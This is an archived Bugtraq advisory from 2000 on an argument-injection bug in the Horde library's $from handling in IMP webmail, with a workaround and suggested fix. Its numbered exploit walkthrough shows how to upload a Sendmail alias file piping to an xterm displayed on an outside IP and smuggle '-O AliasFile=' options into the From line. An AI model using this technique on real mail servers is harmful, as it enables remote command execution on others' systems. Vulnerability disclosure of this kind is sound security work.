[16808] in bugtraq
Horde library Bug part 2
daemon@ATHENA.MIT.EDU (Steube, Jens)
Mon Sep 18 13:50:48 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Message-Id: <27AD015AA2B5D111BD0D00600873390F61FF36@cocbghs0.bgh.coc-ag.de>
Date: Mon, 18 Sep 2000 18:56:14 +0200
Reply-To: "Steube, Jens" <Jens.Steube@COC-AG.DE>
From: "Steube, Jens" <Jens.Steube@COC-AG.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
* Horde Library $from Bug part 2 + How to exploit with IMP and Sendmail *
Description: The Fix of the first detected problem with the $from
variable in the horde library was just escaping shellchars
which avoids directly executing commands.
It is still possible to exploit the parsed $from line and
execute commands under the uid and gid of the webserver.
Tested on: Debian 2.2 (potato)
others not tested yet.
Release Date: 15/09/2000
Autors: Found, exploited and documentated by Jens "atomi" Steube.
Fixed by Christian "thepoet" Winter.
Version: Horde v1.2.1
IMP v2.2.1
The Exploit: e.g: Horde and IMP, as MTA we use Sendmail (v8.11.0)
0. The job is to send a mail to a address
which is defined in an aliasfile which is manually
added to Sendmail. This alias pipes to a command.
1. Logon to IMP and open a compose window.
2. Locally open a texteditor and write a line in mta-aliasfile
format. after that, save it locally.
line e.g:
evil@localhost: "|/usr/X11R6/bin/xterm -display 192.168.4.8:0.0"
(or any other command to be executed on the webserver)
3. Upload the local stored file as an attachment.
4. Open the html source-code of the compose-window
and search for '/tmp'.
5. You will find the local stored filename and
path of the attachment on the webserver.
Copy it to the Clipboard.
mind: that filename looks like /tmp/php??????.att
6. Just close the compose window!
7. Open a new compose window.
8. As your FROM-line insert:
line e.g: (including all quotetypes)
<"x@x -O QueueDirectory=/tmp -O AliasFile=(insert Clipboard) -Fx">
9. As your TO-line insert the useralias, which you have
defined in the uploaded attachement.
e.g: evil@localhost
10. Leave all other fields blank and send the mail.
11. Exploited.
Other MTAs: Above exploit works out with Sendmail in most
configurations, but other MTAs could also be exploited
the same way.
Notice that just disabling of the AliasFile flag is not
enough to prevent attacking this bug because most MTAs
also provide other commandswitches to include external
configuration.
Workaround: The "$from" var has to be checked for "-" chars following
the space character. Passing those chars unfiltered will
nearly always lead to exploitable bugs or errors.
As neither a mail address nor a name with a leading minus
sign does make sense, here is a small patch that converts
every minus at the beginning of a word into an underscore:
http://ssl.coc-ag.de/sec/index.htm#horde02
Fix: Best solution would be generally not to pass vars to
popen(), but rather opening the pipe to Sendmail by calling
popen("$default->path_to_Sendmail -t)
and putting all available information into the mail header.
This requires some extra checking and converting, but
secures the system a lot.
Feedback: Please send suggestions, updates, and comments to
mailto: security@coc-ag.net
http://ssl.coc-ag.de/sec
Disclaimer: The information within this document may change without
notice. Use of this information constitutes acceptance
for use in an AS IS condition. There are NO warranties
with regard to this information. In no event shall the
author be liable for any consequences whatsoever arising
out of or in connection with the use or spread of this
information. Any use of this information lays within the
user's responsibility.
References: Both projects (Horde and IMP) of the horde group can be
found at http://horde.org
Despite those few bugs, these people there have really
done a great job on free software.
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
iQA/AwUBOcY5IP/VNLQKdxzWEQJK+QCg/wSA4/Dz7QgenFcLTig7ZjOlHxsAn2Zt
5WVavlN/5Z991giri/KOIl14
=eyOX
-----END PGP SIGNATURE-----
